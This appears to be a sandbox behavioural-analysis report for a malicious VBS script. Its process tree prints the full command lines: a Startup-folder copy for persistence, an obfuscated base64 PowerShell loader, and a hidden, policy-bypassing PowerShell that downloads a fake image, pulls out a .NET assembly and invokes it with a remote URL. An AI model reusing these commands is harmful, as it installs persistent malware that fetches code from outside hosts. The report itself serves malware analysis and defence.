| ZeroBOX

Behavioral Analysis

Process tree

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\ESL.vbs

    1208
    • cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\ESL.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ WLDY.vbs')"

      2068
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⁂⇵Bp⁂⇵G0⁂⇵YQBn⁂⇵GU⁂⇵VQBy⁂⇵Gw⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵JwBo⁂⇵HQ⁂⇵d⁂⇵Bw⁂⇵HM⁂⇵Og⁂⇵v⁂⇵C8⁂⇵dQBw⁂⇵Gw⁂⇵bwBh⁂⇵GQ⁂⇵Z⁂⇵Bl⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBu⁂⇵HM⁂⇵LgBj⁂⇵G8⁂⇵bQ⁂⇵u⁂⇵GI⁂⇵cg⁂⇵v⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBz⁂⇵C8⁂⇵M⁂⇵⁂⇵w⁂⇵DQ⁂⇵Lw⁂⇵1⁂⇵DY⁂⇵Mw⁂⇵v⁂⇵DY⁂⇵Mg⁂⇵x⁂⇵C8⁂⇵bwBy⁂⇵Gk⁂⇵ZwBp⁂⇵G4⁂⇵YQBs⁂⇵C8⁂⇵dQBu⁂⇵Gk⁂⇵dgBl⁂⇵HI⁂⇵cwBv⁂⇵F8⁂⇵dgBi⁂⇵HM⁂⇵LgBq⁂⇵H⁂⇵⁂⇵ZQBn⁂⇵D8⁂⇵MQ⁂⇵2⁂⇵Dk⁂⇵M⁂⇵⁂⇵5⁂⇵DM⁂⇵MQ⁂⇵4⁂⇵DU⁂⇵NQ⁂⇵n⁂⇵Ds⁂⇵J⁂⇵B3⁂⇵GU⁂⇵YgBD⁂⇵Gw⁂⇵aQBl⁂⇵G4⁂⇵d⁂⇵⁂⇵g⁂⇵D0⁂⇵I⁂⇵BO⁂⇵GU⁂⇵dw⁂⇵t⁂⇵E8⁂⇵YgBq⁂⇵GU⁂⇵YwB0⁂⇵C⁂⇵⁂⇵UwB5⁂⇵HM⁂⇵d⁂⇵Bl⁂⇵G0⁂⇵LgBO⁂⇵GU⁂⇵d⁂⇵⁂⇵u⁂⇵Fc⁂⇵ZQBi⁂⇵EM⁂⇵b⁂⇵Bp⁂⇵GU⁂⇵bgB0⁂⇵Ds⁂⇵J⁂⇵Bp⁂⇵G0⁂⇵YQBn⁂⇵GU⁂⇵QgB5⁂⇵HQ⁂⇵ZQBz⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵CQ⁂⇵dwBl⁂⇵GI⁂⇵QwBs⁂⇵Gk⁂⇵ZQBu⁂⇵HQ⁂⇵LgBE⁂⇵G8⁂⇵dwBu⁂⇵Gw⁂⇵bwBh⁂⇵GQ⁂⇵R⁂⇵Bh⁂⇵HQ⁂⇵YQ⁂⇵o⁂⇵CQ⁂⇵aQBt⁂⇵GE⁂⇵ZwBl⁂⇵FU⁂⇵cgBs⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBU⁂⇵GU⁂⇵e⁂⇵B0⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵Fs⁂⇵UwB5⁂⇵HM⁂⇵d⁂⇵Bl⁂⇵G0⁂⇵LgBU⁂⇵GU⁂⇵e⁂⇵B0⁂⇵C4⁂⇵RQBu⁂⇵GM⁂⇵bwBk⁂⇵Gk⁂⇵bgBn⁂⇵F0⁂⇵Og⁂⇵6⁂⇵FU⁂⇵V⁂⇵BG⁂⇵Dg⁂⇵LgBH⁂⇵GU⁂⇵d⁂⇵BT⁂⇵HQ⁂⇵cgBp⁂⇵G4⁂⇵Zw⁂⇵o⁂⇵CQ⁂⇵aQBt⁂⇵GE⁂⇵ZwBl⁂⇵EI⁂⇵eQB0⁂⇵GU⁂⇵cw⁂⇵p⁂⇵Ds⁂⇵J⁂⇵Bz⁂⇵HQ⁂⇵YQBy⁂⇵HQ⁂⇵RgBs⁂⇵GE⁂⇵Zw⁂⇵g⁂⇵D0⁂⇵I⁂⇵⁂⇵n⁂⇵Dw⁂⇵P⁂⇵BC⁂⇵EE⁂⇵UwBF⁂⇵DY⁂⇵N⁂⇵Bf⁂⇵FM⁂⇵V⁂⇵BB⁂⇵FI⁂⇵V⁂⇵⁂⇵+⁂⇵D4⁂⇵Jw⁂⇵7⁂⇵CQ⁂⇵ZQBu⁂⇵GQ⁂⇵RgBs⁂⇵GE⁂⇵Zw⁂⇵g⁂⇵D0⁂⇵I⁂⇵⁂⇵n⁂⇵Dw⁂⇵P⁂⇵BC⁂⇵EE⁂⇵UwBF⁂⇵DY⁂⇵N⁂⇵Bf⁂⇵EU⁂⇵TgBE⁂⇵D4⁂⇵Pg⁂⇵n⁂⇵Ds⁂⇵J⁂⇵Bz⁂⇵HQ⁂⇵YQBy⁂⇵HQ⁂⇵SQBu⁂⇵GQ⁂⇵ZQB4⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵CQ⁂⇵aQBt⁂⇵GE⁂⇵ZwBl⁂⇵FQ⁂⇵ZQB4⁂⇵HQ⁂⇵LgBJ⁂⇵G4⁂⇵Z⁂⇵Bl⁂⇵Hg⁂⇵TwBm⁂⇵Cg⁂⇵J⁂⇵Bz⁂⇵HQ⁂⇵YQBy⁂⇵HQ⁂⇵RgBs⁂⇵GE⁂⇵Zw⁂⇵p⁂⇵Ds⁂⇵J⁂⇵Bl⁂⇵G4⁂⇵Z⁂⇵BJ⁂⇵G4⁂⇵Z⁂⇵Bl⁂⇵Hg⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵J⁂⇵Bp⁂⇵G0⁂⇵YQBn⁂⇵GU⁂⇵V⁂⇵Bl⁂⇵Hg⁂⇵d⁂⇵⁂⇵u⁂⇵Ek⁂⇵bgBk⁂⇵GU⁂⇵e⁂⇵BP⁂⇵GY⁂⇵K⁂⇵⁂⇵k⁂⇵GU⁂⇵bgBk⁂⇵EY⁂⇵b⁂⇵Bh⁂⇵Gc⁂⇵KQ⁂⇵7⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵Ek⁂⇵bgBk⁂⇵GU⁂⇵e⁂⇵⁂⇵g⁂⇵C0⁂⇵ZwBl⁂⇵C⁂⇵⁂⇵M⁂⇵⁂⇵g⁂⇵C0⁂⇵YQBu⁂⇵GQ⁂⇵I⁂⇵⁂⇵k⁂⇵GU⁂⇵bgBk⁂⇵Ek⁂⇵bgBk⁂⇵GU⁂⇵e⁂⇵⁂⇵g⁂⇵C0⁂⇵ZwB0⁂⇵C⁂⇵⁂⇵J⁂⇵Bz⁂⇵HQ⁂⇵YQBy⁂⇵HQ⁂⇵SQBu⁂⇵GQ⁂⇵ZQB4⁂⇵Ds⁂⇵J⁂⇵Bz⁂⇵HQ⁂⇵YQBy⁂⇵HQ⁂⇵SQBu⁂⇵GQ⁂⇵ZQB4⁂⇵C⁂⇵⁂⇵Kw⁂⇵9⁂⇵C⁂⇵⁂⇵J⁂⇵Bz⁂⇵HQ⁂⇵YQBy⁂⇵HQ⁂⇵RgBs⁂⇵GE⁂⇵Zw⁂⇵u⁂⇵Ew⁂⇵ZQBu⁂⇵Gc⁂⇵d⁂⇵Bo⁂⇵Ds⁂⇵J⁂⇵Bi⁂⇵GE⁂⇵cwBl⁂⇵DY⁂⇵N⁂⇵BM⁂⇵GU⁂⇵bgBn⁂⇵HQ⁂⇵a⁂⇵⁂⇵g⁂⇵D0⁂⇵I⁂⇵⁂⇵k⁂⇵GU⁂⇵bgBk⁂⇵Ek⁂⇵bgBk⁂⇵GU⁂⇵e⁂⇵⁂⇵g⁂⇵C0⁂⇵I⁂⇵⁂⇵k⁂⇵HM⁂⇵d⁂⇵Bh⁂⇵HI⁂⇵d⁂⇵BJ⁂⇵G4⁂⇵Z⁂⇵Bl⁂⇵Hg⁂⇵Ow⁂⇵k⁂⇵GI⁂⇵YQBz⁂⇵GU⁂⇵Ng⁂⇵0⁂⇵EM⁂⇵bwBt⁂⇵G0⁂⇵YQBu⁂⇵GQ⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵J⁂⇵Bp⁂⇵G0⁂⇵YQBn⁂⇵GU⁂⇵V⁂⇵Bl⁂⇵Hg⁂⇵d⁂⇵⁂⇵u⁂⇵FM⁂⇵dQBi⁂⇵HM⁂⇵d⁂⇵By⁂⇵Gk⁂⇵bgBn⁂⇵Cg⁂⇵J⁂⇵Bz⁂⇵HQ⁂⇵YQBy⁂⇵HQ⁂⇵SQBu⁂⇵GQ⁂⇵ZQB4⁂⇵Cw⁂⇵I⁂⇵⁂⇵k⁂⇵GI⁂⇵YQBz⁂⇵GU⁂⇵Ng⁂⇵0⁂⇵Ew⁂⇵ZQBu⁂⇵Gc⁂⇵d⁂⇵Bo⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵GM⁂⇵bwBt⁂⇵G0⁂⇵YQBu⁂⇵GQ⁂⇵QgB5⁂⇵HQ⁂⇵ZQBz⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵Fs⁂⇵UwB5⁂⇵HM⁂⇵d⁂⇵Bl⁂⇵G0⁂⇵LgBD⁂⇵G8⁂⇵bgB2⁂⇵GU⁂⇵cgB0⁂⇵F0⁂⇵Og⁂⇵6⁂⇵EY⁂⇵cgBv⁂⇵G0⁂⇵QgBh⁂⇵HM⁂⇵ZQ⁂⇵2⁂⇵DQ⁂⇵UwB0⁂⇵HI⁂⇵aQBu⁂⇵Gc⁂⇵K⁂⇵⁂⇵k⁂⇵GI⁂⇵YQBz⁂⇵GU⁂⇵Ng⁂⇵0⁂⇵EM⁂⇵bwBt⁂⇵G0⁂⇵YQBu⁂⇵GQ⁂⇵KQ⁂⇵7⁂⇵CQ⁂⇵b⁂⇵Bv⁂⇵GE⁂⇵Z⁂⇵Bl⁂⇵GQ⁂⇵QQBz⁂⇵HM⁂⇵ZQBt⁂⇵GI⁂⇵b⁂⇵B5⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵Fs⁂⇵UwB5⁂⇵HM⁂⇵d⁂⇵Bl⁂⇵G0⁂⇵LgBS⁂⇵GU⁂⇵ZgBs⁂⇵GU⁂⇵YwB0⁂⇵Gk⁂⇵bwBu⁂⇵C4⁂⇵QQBz⁂⇵HM⁂⇵ZQBt⁂⇵GI⁂⇵b⁂⇵B5⁂⇵F0⁂⇵Og⁂⇵6⁂⇵Ew⁂⇵bwBh⁂⇵GQ⁂⇵K⁂⇵⁂⇵k⁂⇵GM⁂⇵bwBt⁂⇵G0⁂⇵YQBu⁂⇵GQ⁂⇵QgB5⁂⇵HQ⁂⇵ZQBz⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵HQ⁂⇵eQBw⁂⇵GU⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵J⁂⇵Bs⁂⇵G8⁂⇵YQBk⁂⇵GU⁂⇵Z⁂⇵BB⁂⇵HM⁂⇵cwBl⁂⇵G0⁂⇵YgBs⁂⇵Hk⁂⇵LgBH⁂⇵GU⁂⇵d⁂⇵BU⁂⇵Hk⁂⇵c⁂⇵Bl⁂⇵Cg⁂⇵JwBG⁂⇵Gk⁂⇵YgBl⁂⇵HI⁂⇵LgBI⁂⇵G8⁂⇵bQBl⁂⇵Cc⁂⇵KQ⁂⇵7⁂⇵CQ⁂⇵bQBl⁂⇵HQ⁂⇵a⁂⇵Bv⁂⇵GQ⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵J⁂⇵B0⁂⇵Hk⁂⇵c⁂⇵Bl⁂⇵C4⁂⇵RwBl⁂⇵HQ⁂⇵TQBl⁂⇵HQ⁂⇵a⁂⇵Bv⁂⇵GQ⁂⇵K⁂⇵⁂⇵n⁂⇵FY⁂⇵QQBJ⁂⇵Cc⁂⇵KQ⁂⇵7⁂⇵CQ⁂⇵YQBy⁂⇵Gc⁂⇵dQBt⁂⇵GU⁂⇵bgB0⁂⇵HM⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵L⁂⇵⁂⇵o⁂⇵Cc⁂⇵d⁂⇵B4⁂⇵HQ⁂⇵Lg⁂⇵y⁂⇵DM⁂⇵N⁂⇵Bk⁂⇵GU⁂⇵LwBs⁂⇵HQ⁂⇵Lw⁂⇵3⁂⇵DY⁂⇵MQ⁂⇵u⁂⇵DE⁂⇵Ng⁂⇵x⁂⇵C4⁂⇵Ng⁂⇵1⁂⇵DE⁂⇵Lg⁂⇵0⁂⇵Dk⁂⇵Lw⁂⇵v⁂⇵Do⁂⇵c⁂⇵B0⁂⇵HQ⁂⇵a⁂⇵⁂⇵n⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵G0⁂⇵ZQB0⁂⇵Gg⁂⇵bwBk⁂⇵C4⁂⇵SQBu⁂⇵HY⁂⇵bwBr⁂⇵GU⁂⇵K⁂⇵⁂⇵k⁂⇵G4⁂⇵dQBs⁂⇵Gw⁂⇵L⁂⇵⁂⇵g⁂⇵CQ⁂⇵YQBy⁂⇵Gc⁂⇵dQBt⁂⇵GU⁂⇵bgB0⁂⇵HM⁂⇵KQ⁂⇵=';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('⁂⇵','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD

      2416
      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/563/621/original/universo_vbs.jpeg?1690931855';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.234de/lt/761.161.651.49//:ptth');$method.Invoke($null, $arguments)"

        2508

Process contents

No process loaded Click on a process in the tree above to load its data.